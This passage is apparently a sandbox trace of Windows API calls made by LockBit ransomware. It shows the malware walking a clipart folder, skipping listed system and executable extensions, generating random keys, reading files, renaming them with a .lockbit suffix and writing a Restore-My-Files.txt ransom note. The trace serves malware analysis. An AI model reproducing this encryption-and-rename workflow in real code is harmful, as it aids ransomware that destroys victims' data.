(lpString1=".cpl", lpString2=".WMF") returned -1 [0118.134] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0118.134] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0118.134] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0118.134] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0118.134] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0118.134] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0118.134] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0118.134] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0118.134] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0118.134] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0118.134] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0118.134] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0118.135] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0118.135] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0118.135] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0118.135] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0118.135] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0118.135] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0118.135] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0118.135] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0118.135] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0118.135] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0118.135] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0118.135] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0118.135] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0118.135] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0118.135] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0118.135] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0118.135] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0118.135] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0118.135] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0118.135] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="HH01058_.WMF") returned 1 [0118.136] lstrcmpiW (lpString1="ntldr", lpString2="HH01058_.WMF") returned 1 [0118.136] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="HH01058_.WMF") returned 1 [0118.136] lstrcmpiW (lpString1="bootsect.bak", lpString2="HH01058_.WMF") returned -1 [0118.136] lstrcmpiW (lpString1="autorun.inf", lpString2="HH01058_.WMF") returned -1 [0118.136] lstrcmpiW (lpString1="thumbs.db", lpString2="HH01058_.WMF") returned 1 [0118.136] lstrcmpiW (lpString1="iconcache.db", lpString2="HH01058_.WMF") returned 1 [0118.136] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0118.136] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01058_.WMF") returned=".WMF" [0118.136] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0118.136] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0118.136] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0118.136] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0118.136] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0118.136] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0118.136] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0118.136] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0118.136] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0118.136] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0118.136] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0118.136] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0118.137] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0118.137] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0118.137] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0118.137] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0118.137] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0118.137] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0118.137] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0118.137] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0118.137] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0118.137] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0118.137] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0118.137] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0118.138] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0118.138] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0118.138] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0118.138] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0118.138] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01058_.WMF.lockbit") returned 72 [0118.138] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01058_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh01058_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2f4 [0118.139] CreateIoCompletionPort (FileHandle=0x2f4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0118.139] malloc (_Size=0x40068) returned 0x1ff1e60 [0118.139] GetFileSizeEx (in: hFile=0x2f4, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=2756) returned 1 [0118.139] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0118.140] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0118.140] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0118.140] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0118.140] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0118.141] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0118.141] ReadFile (in: hFile=0x2f4, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0118.145] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01058_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01058_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0118.145] malloc (_Size=0xa6) returned 0x77d7a8 [0118.145] NtSetInformationFile (FileHandle=0x2f4, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0118.146] free (_Block=0x77d7a8) [0118.146] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01058_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0118.146] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0118.147] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0118.147] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x39e49800, ftCreationTime.dwHighDateTime=0x1bd4af4, ftLastAccessTime.dwLowDateTime=0x61ca6dd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x39e49800, ftLastWriteTime.dwHighDateTime=0x1bd4af4, nFileSizeHigh=0x0, nFileSizeLow=0x4f4, dwReserved0=0x0, dwReserved1=0x0, cFileName="HH01065_.WMF", cAlternateFileName="")) returned 1 [0118.147] lstrcmpiW (lpString1=".", lpString2="HH01065_.WMF") returned -1 [0118.147] lstrcmpiW (lpString1="..", lpString2="HH01065_.WMF") returned -1 [0118.147] PathFindExtensionW (pszPath="HH01065_.WMF") returned=".WMF" [0118.147] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0118.147] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0118.147] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0118.147] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0118.147] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0118.147] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0118.147] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0118.147] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0118.147] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0118.147] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0118.147] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0118.148] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0118.148] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0118.148] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0118.148] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0118.148] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0118.148] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0118.148] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0118.148] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0118.148] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0118.148] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0118.148] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0118.148] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0118.148] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0118.148] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0118.148] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0118.148] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0118.148] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0118.148] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0118.148] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0118.149] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0118.149] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0118.149] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0118.149] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0118.149] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0118.149] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0118.149] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0118.149] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0118.149] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0118.149] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0118.149] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0118.149] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0118.149] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0118.149] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0118.149] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0118.149] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0118.149] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0118.149] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="HH01065_.WMF") returned 1 [0118.149] lstrcmpiW (lpString1="ntldr", lpString2="HH01065_.WMF") returned 1 [0118.150] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="HH01065_.WMF") returned 1 [0118.150] lstrcmpiW (lpString1="bootsect.bak", lpString2="HH01065_.WMF") returned -1 [0118.150] lstrcmpiW (lpString1="autorun.inf", lpString2="HH01065_.WMF") returned -1 [0118.150] lstrcmpiW (lpString1="thumbs.db", lpString2="HH01065_.WMF") returned 1 [0118.150] lstrcmpiW (lpString1="iconcache.db", lpString2="HH01065_.WMF") returned 1 [0118.150] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0118.150] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01065_.WMF") returned=".WMF" [0118.150] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0118.150] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0118.150] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0118.150] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0118.150] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0118.150] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0118.150] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0118.150] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0118.150] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0118.150] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0118.150] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0118.150] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0118.151] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0118.151] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0118.151] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0118.151] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0118.151] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0118.151] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0118.151] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0118.151] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0118.151] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0118.151] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0118.151] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0118.151] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0118.151] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0118.151] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0118.151] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0118.151] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0118.151] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01065_.WMF.lockbit") returned 72 [0118.152] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01065_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh01065_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x13c0 [0118.152] CreateIoCompletionPort (FileHandle=0x13c0, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0118.152] malloc (_Size=0x40068) returned 0x3db04c0 [0118.154] GetFileSizeEx (in: hFile=0x13c0, lpFileSize=0x3db04d8 | out: lpFileSize=0x3db04d8*=1268) returned 1 [0118.154] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0118.154] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0118.154] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3df04f4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3df04f4) returned 0x0 [0118.154] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0118.155] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0118.155] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3df0504, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3df0504) returned 0x0 [0118.155] ReadFile (in: hFile=0x13c0, lpBuffer=0x3db04f4, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3db04c0 | out: lpBuffer=0x3db04f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3db04c0) returned 1 [0118.165] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01065_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01065_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0118.165] malloc (_Size=0xa6) returned 0x77d7a8 [0118.165] NtSetInformationFile (FileHandle=0x13c0, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0118.166] free (_Block=0x77d7a8) [0118.166] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01065_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0118.166] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0118.166] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0118.166] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x25a09b00, ftCreationTime.dwHighDateTime=0x1bd4af4, ftLastAccessTime.dwLowDateTime=0x61ca6dd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x25a09b00, ftLastWriteTime.dwHighDateTime=0x1bd4af4, nFileSizeHigh=0x0, nFileSizeLow=0x1388, dwReserved0=0x0, dwReserved1=0x0, cFileName="HH01080_.WMF", cAlternateFileName="")) returned 1 [0118.166] lstrcmpiW (lpString1=".", lpString2="HH01080_.WMF") returned -1 [0118.166] lstrcmpiW (lpString1="..", lpString2="HH01080_.WMF") returned -1 [0118.166] PathFindExtensionW (pszPath="HH01080_.WMF") returned=".WMF" [0118.166] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0118.166] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0118.166] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0118.167] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0118.167] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0118.167] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0118.167] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0118.167] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0118.167] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0118.167] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0118.167] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0118.167] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0118.167] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0118.167] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0118.167] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0118.167] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0118.167] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0118.167] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0118.167] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0118.167] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0118.167] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0118.167] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0118.167] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0118.167] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0118.167] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0118.167] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0118.167] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0118.168] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0118.168] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0118.168] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0118.168] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0118.168] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0118.168] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0118.168] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0118.168] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0118.168] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0118.168] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0118.168] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0118.168] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0118.168] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0118.168] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0118.168] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0118.168] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0118.168] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0118.168] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0118.168] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0118.168] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0118.168] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="HH01080_.WMF") returned 1 [0118.168] lstrcmpiW (lpString1="ntldr", lpString2="HH01080_.WMF") returned 1 [0118.168] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="HH01080_.WMF") returned 1 [0118.169] lstrcmpiW (lpString1="bootsect.bak", lpString2="HH01080_.WMF") returned -1 [0118.169] lstrcmpiW (lpString1="autorun.inf", lpString2="HH01080_.WMF") returned -1 [0118.169] lstrcmpiW (lpString1="thumbs.db", lpString2="HH01080_.WMF") returned 1 [0118.169] lstrcmpiW (lpString1="iconcache.db", lpString2="HH01080_.WMF") returned 1 [0118.169] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0118.169] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01080_.WMF") returned=".WMF" [0118.169] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0118.169] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0118.169] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0118.169] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0118.169] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0118.169] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0118.169] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0118.169] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0118.169] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0118.169] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0118.169] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0118.169] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0118.169] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0118.169] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0118.169] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0118.170] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0118.170] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0118.170] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0118.170] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0118.170] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0118.170] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0118.170] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0118.170] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0118.170] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0118.170] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0118.170] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0118.170] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0118.170] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0118.170] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01080_.WMF.lockbit") returned 72 [0118.170] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01080_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh01080_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3bc [0118.171] CreateIoCompletionPort (FileHandle=0x3bc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0118.171] malloc (_Size=0x40068) returned 0x3d70450 [0118.171] GetFileSizeEx (in: hFile=0x3bc, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=5000) returned 1 [0118.171] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0118.172] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0118.172] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, 